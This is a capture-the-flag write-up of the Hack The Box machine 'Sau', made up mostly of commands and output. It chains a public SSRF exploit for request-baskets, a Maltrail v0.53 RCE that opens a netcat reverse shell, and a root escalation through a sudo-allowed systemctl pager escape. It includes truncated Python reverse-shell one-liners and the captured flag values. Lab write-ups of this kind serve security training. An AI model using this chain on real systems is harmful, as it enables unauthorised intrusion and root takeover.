Skip to content

HTB Sau done

Sau

OS:

Linux

Technology:

request-baskets 1.2.1
Maltrail v0.53

IP Address:

10.10.11.224

Open ports:

22/tcp    open     ssh     OpenSSH 8.2p1 Ubuntu 4ubuntu0.7 (Ubuntu Linux; protocol 2.0)
80/tcp    filtered http
8338/tcp  filtered unknown
55555/tcp open     unknown

Users and pass:

Nmap

┌──(kali㉿kali)-[~/…/oscp/writeups/HTB/HTB_Sau]
└─$ sudo nmap -A -sV --script=default -p- -oA 10.10.11.224_nmap 10.10.11.224 ; cat 10.10.11.224_nmap.nmap | grep -E "^[0-9]{1,}/(tcp|udp)"
Starting Nmap 7.94SVN ( https://nmap.org ) at 2024-08-04 01:48 CEST
Nmap scan report for 10.10.11.224
Host is up (0.034s latency).
Not shown: 65531 closed tcp ports (reset)
PORT      STATE    SERVICE VERSION
22/tcp    open     ssh     OpenSSH 8.2p1 Ubuntu 4ubuntu0.7 (Ubuntu Linux; protocol 2.0)
| ssh-hostkey: 
|   3072 aa:88:67:d7:13:3d:08:3a:8a:ce:9d:c4:dd:f3:e1:ed (RSA)
|   256 ec:2e:b1:05:87:2a:0c:7d:b1:49:87:64:95:dc:8a:21 (ECDSA)
|_  256 b3:0c:47:fb:a2:f2:12:cc:ce:0b:58:82:0e:50:43:36 (ED25519)
80/tcp    filtered http
8338/tcp  filtered unknown
55555/tcp open     unknown
| fingerprint-strings: 
|   FourOhFourRequest: 
|     HTTP/1.0 400 Bad Request
|     Content-Type: text/plain; charset=utf-8
|     X-Content-Type-Options: nosniff
|     Date: Sat, 03 Aug 2024 23:49:31 GMT
|     Content-Length: 75
|     invalid basket name; the name does not match pattern: ^[wd-_\.]{1,250}$
|   GenericLines, Help, Kerberos, LDAPSearchReq, LPDString, RTSPRequest, SSLSessionReq, TLSSessionReq, TerminalServerCookie: 
|     HTTP/1.1 400 Bad Request
|     Content-Type: text/plain; charset=utf-8
|     Connection: close
|     Request
|   GetRequest: 
|     HTTP/1.0 302 Found
|     Content-Type: text/html; charset=utf-8
|     Location: /web
|     Date: Sat, 03 Aug 2024 23:49:06 GMT
|     Content-Length: 27
|     href="/web">Found</a>.
|   HTTPOptions: 
|     HTTP/1.0 200 OK
|     Allow: GET, OPTIONS
|     Date: Sat, 03 Aug 2024 23:49:06 GMT
|_    Content-Length: 0

Exploit: SSRF on Request-Baskets (CVE-2023-27163)

[PoC of SSRF on Request-Baskets (CVE-2023-27163)](https://github.com/entr0pie/CVE-2023-27163/blob/main/CVE-2023-27163.sh)

Download exploit:

┌──(kali㉿kali)-[~/…/oscp/writeups/HTB/HTB_Sau]
└─$ wget https://raw.githubusercontent.com/entr0pie/CVE-2023-27163/main/CVE-2023-27163.sh 
--2024-08-04 01:56:05--  https://raw.githubusercontent.com/entr0pie/CVE-2023-27163/main/CVE-2023-27163.sh
Resolving raw.githubusercontent.com (raw.githubusercontent.com)... 185.199.109.133, 185.199.110.133, 185.199.111.133, ...
Connecting to raw.githubusercontent.com (raw.githubusercontent.com)|185.199.109.133|:443... connected.
HTTP request sent, awaiting response... 200 OK
Length: 1669 (1.6K) [text/plain]
Saving to: ‘CVE-2023-27163.sh’

CVE-2023-27163.sh             100%[==============================================>]   1.63K  --.-KB/s    in 0s      

2024-08-04 01:56:05 (8.87 MB/s) - ‘CVE-2023-27163.sh’ saved [1669/1669]

Run exploit

┌──(kali㉿kali)-[~/…/oscp/writeups/HTB/HTB_Sau]
└─$ ./CVE-2023-27163.sh http://10.10.11.224:55555 http://127.0.0.1:80 
Proof-of-Concept of SSRF on Request-Baskets (CVE-2023-27163) || More info at https://github.com/entr0pie/CVE-2023-27163

> Creating the "dwkyxs" proxy basket...
> Basket created!
> Accessing http://10.10.11.224:55555/dwkyxs now makes the server request to http://127.0.0.1:80.
> Authorization: sqo80wPINNVtldYtgycBga2NssBm8efw8eu01jb7Sz0-

Open website: http://10.10.11.224:55555/dwkyxs

I found a website application called: Mailtrail and it version is: 0.53

Exploit: Maltrail-v0.53-RCE

[Maltrail-v0.53-RCE](https://raw.githubusercontent.com/josephberger/Maltrail-v0.53-RCE/main/exploit.py)

Download exploit

┌──(kali㉿kali)-[~/…/oscp/writeups/HTB/HTB_Sau]
└─$ wget https://raw.githubusercontent.com/josephberger/Maltrail-v0.53-RCE/main/exploit.py
--2024-08-04 02:24:47--  https://raw.githubusercontent.com/josephberger/Maltrail-v0.53-RCE/main/exploit.py
Resolving raw.githubusercontent.com (raw.githubusercontent.com)... 185.199.110.133, 185.199.109.133, 185.199.111.133, ...
Connecting to raw.githubusercontent.com (raw.githubusercontent.com)|185.199.110.133|:443... connected.
HTTP request sent, awaiting response... 200 OK
Length: 1667 (1.6K) [text/plain]
Saving to: ‘exploit.py’

exploit.py                    100%[==============================================>]   1.63K  --.-KB/s    in 0s      

2024-08-04 02:24:47 (7.80 MB/s) - ‘exploit.py’ saved [1667/1667]

Run exploit

* Create SSRF on Request-Baskets
___
┌──(kali㉿kali)-[~/…/oscp/writeups/HTB/HTB_Sau]
└─$ ./CVE-2023-27163.sh http://10.10.11.224:55555 http://127.0.0.1:80      
Proof-of-Concept of SSRF on Request-Baskets (CVE-2023-27163) || More info at https://github.com/entr0pie/CVE-2023-27163

> Creating the "hdswtj" proxy basket...
> Basket created!
> Accessing http://10.10.11.224:55555/hdswtj now makes the server request to http://127.0.0.1:80.
> Authorization: eMOdaY1Hum-fhhVSUWFA594vXutofLUmkfges9NYylX2
---
* Start netcat
___
┌──(kali㉿kali)-[~/…/oscp/writeups/HTB/HTB_Sau]
└─$ netcat -lvnp 443
listening on [any] 443 ...
connect to [10.10.14.9] from (UNKNOWN) [10.10.11.224] 37042
$ script /dev/null -c /bin/bash
script /dev/null -c /bin/bash
Script started, file is /dev/null
puma@sau:/opt/maltrail$ 
---
* Run exploit
┌──(kali㉿kali)-[~/…/oscp/writeups/HTB/HTB_Sau]
└─$ python exploit.py 10.10.14.9 443 http://10.10.11.224:55555/hdswtj

Read flag: user.txt

puma@sau:/opt/maltrail$ find / -name "user.txt" 2>/dev/null
find / -name "user.txt" 2>/dev/null
/home/puma/user.txt


cd /home/pma/
cd /home/pma/
puma@sau:/opt/maltrail$ 
puma@sau:/opt/maltrail$ cd /home/pma/
bash: cd: /home/pma/: No such file or directory
puma@sau:/opt/maltrail$ cd /home/puma
cd /home/puma
puma@sau:~$ ls -la 
ls -la
total 32
drwxr-xr-x 4 puma puma 4096 Jun 19  2023 .
drwxr-xr-x 3 root root 4096 Apr 15  2023 ..
lrwxrwxrwx 1 root root    9 Apr 14  2023 .bash_history -> /dev/null
-rw-r--r-- 1 puma puma  220 Feb 25  2020 .bash_logout
-rw-r--r-- 1 puma puma 3771 Feb 25  2020 .bashrc
drwx------ 2 puma puma 4096 Apr 15  2023 .cache
drwx------ 3 puma puma 4096 Apr 15  2023 .gnupg
-rw-r--r-- 1 puma puma  807 Feb 25  2020 .profile
lrwxrwxrwx 1 puma puma    9 Apr 15  2023 .viminfo -> /dev/null
lrwxrwxrwx 1 puma puma    9 Apr 15  2023 .wget-hsts -> /dev/null
-rw-r----- 1 root puma   33 Aug  3 22:40 user.txt
puma@sau:~$ cat user.txt ; id ; ip a
cat user.txt ; id ; ip a
78231a4eef0bd8f8ddf3ae5bb43cba25
uid=1001(puma) gid=1001(puma) groups=1001(puma)
1: lo: <LOOPBACK,UP,LOWER_UP> mtu 65536 qdisc noqueue state UNKNOWN group default qlen 1000
    link/loopback 00:00:00:00:00:00 brd 00:00:00:00:00:00
    inet 127.0.0.1/8 scope host lo
       valid_lft forever preferred_lft forever
    inet6 ::1/128 scope host 
       valid_lft forever preferred_lft forever
2: eth0: <BROADCAST,MULTICAST,UP,LOWER_UP> mtu 1500 qdisc mq state UP group default qlen 1000
    link/ether 00:50:56:94:4e:d8 brd ff:ff:ff:ff:ff:ff
    inet 10.10.11.224/23 brd 10.10.11.255 scope global eth0
       valid_lft forever preferred_lft forever
    inet6 dead:beef::250:56ff:fe94:4ed8/64 scope global dynamic mngtmpaddr 
       valid_lft 86400sec preferred_lft 14400sec
    inet6 fe80::250:56ff:fe94:4ed8/64 scope link 
       valid_lft forever preferred_lft forever
puma@sau:~$

Privilege Escalation

sudo

puma@sau:~$ sudo -l
sudo -l
Matching Defaults entries for puma on sau:
    env_reset, mail_badpass,
    secure_path=/usr/local/sbin\:/usr/local/bin\:/usr/sbin\:/usr/bin\:/sbin\:/bin\:/snap/bin

User puma may run the following commands on sau:
    (ALL : ALL) NOPASSWD: /usr/bin/systemctl status trail.service
puma@sau:~$

GTFOBins - systemctl

https://gtfobins.github.io/gtfobins/systemctl/
---
puma@sau:~$ sudo /usr/bin/systemctl status trail.service
sudo /usr/bin/systemctl status trail.service
WARNING: terminal is not fully functional
-  (press RETURN)
● trail.service - Maltrail. Server of malicious traffic detection system
     Loaded: loaded (/etc/systemd/system/trail.service; enabled; vendor preset:>
     Active: active (running) since Sat 2024-08-03 22:40:42 UTC; 1h 57min ago
       Docs: https://github.com/stamparm/maltrail#readme
             https://github.com/stamparm/maltrail/wiki
   Main PID: 892 (python3)
      Tasks: 24 (limit: 4662)
     Memory: 139.9M
     CGroup: /system.slice/trail.service
             ├─ 892 /usr/bin/python3 server.py
             ├─1390 /bin/sh -c logger -p auth.info -t "maltrail[892]" "Failed p>
             ├─1391 /bin/sh -c logger -p auth.info -t "maltrail[892]" "Failed p>
             ├─1396 sh
             ├─1401 python3 -c import socket,os,pty;s=socket.socket(socket.AF_I>
             ├─1402 /bin/sh
             ├─1405 /bin/sh -c logger -p auth.info -t "maltrail[892]" "Failed p>
             ├─1406 /bin/sh -c logger -p auth.info -t "maltrail[892]" "Failed p>
             ├─1409 sh
             ├─1410 python3 -c import socket,subprocess,os;s=socket.socket(sock>
             ├─1411 sh
             ├─1414 /bin/sh -c logger -p auth.info -t "maltrail[892]" "Failed p>
             ├─1415 /bin/sh -c logger -p auth.info -t "maltrail[892]" "Failed p>
             ├─1418 sh
lines 1-23!sh
!sshh!sh
# 

# id
id
uid=0(root) gid=0(root) groups=0(root)

Read flag: root.txt

# id
id
uid=0(root) gid=0(root) groups=0(root)
#    

# cd /root
cd /root
# ls -la
ls -la
total 44
drwx------  6 root root 4096 Aug  4 00:37 .
drwxr-xr-x 20 root root 4096 Jun 19  2023 ..
lrwxrwxrwx  1 root root    9 Apr 15  2023 .bash_history -> /dev/null
-rw-r--r--  1 root root 3106 Dec  5  2019 .bashrc
drwx------  3 root root 4096 Jun 19  2023 .cache
-rw-------  1 root root   31 Aug  4 00:37 .lesshst
drwxr-xr-x  3 root root 4096 Jun  8  2023 .local
-rw-r--r--  1 root root  161 Dec  5  2019 .profile
drwx------  2 root root 4096 Apr 14  2023 .ssh
-rw-r--r--  1 root root   39 Jun  8  2023 .vimrc
lrwxrwxrwx  1 root root    9 Apr 15  2023 .wget-hsts -> /dev/null
drwxr-xr-x  4 root root 4096 Jun 19  2023 go
-rw-r-----  1 root root   33 Aug  3 22:40 root.txt
# cat root.txt; id ; ip a
cat root.txt; id ; ip a
b5eff1b70bb959e57be530cb273e1a31
uid=0(root) gid=0(root) groups=0(root)
1: lo: <LOOPBACK,UP,LOWER_UP> mtu 65536 qdisc noqueue state UNKNOWN group default qlen 1000
    link/loopback 00:00:00:00:00:00 brd 00:00:00:00:00:00
    inet 127.0.0.1/8 scope host lo
       valid_lft forever preferred_lft forever
    inet6 ::1/128 scope host 
       valid_lft forever preferred_lft forever
2: eth0: <BROADCAST,MULTICAST,UP,LOWER_UP> mtu 1500 qdisc mq state UP group default qlen 1000
    link/ether 00:50:56:94:4e:d8 brd ff:ff:ff:ff:ff:ff
    inet 10.10.11.224/23 brd 10.10.11.255 scope global eth0
       valid_lft forever preferred_lft forever
    inet6 dead:beef::250:56ff:fe94:4ed8/64 scope global dynamic mngtmpaddr 
       valid_lft 86399sec preferred_lft 14399sec
    inet6 fe80::250:56ff:fe94:4ed8/64 scope link 
       valid_lft forever preferred_lft forever
#

References

[PoC of SSRF on Request-Baskets (CVE-2023-27163)](https://github.com/entr0pie/CVE-2023-27163/blob/main/CVE-2023-27163.sh)
[Maltrail-v0.53-RCE](https://raw.githubusercontent.com/josephberger/Maltrail-v0.53-RCE/main/exploit.py)

Lessons Learned

Tags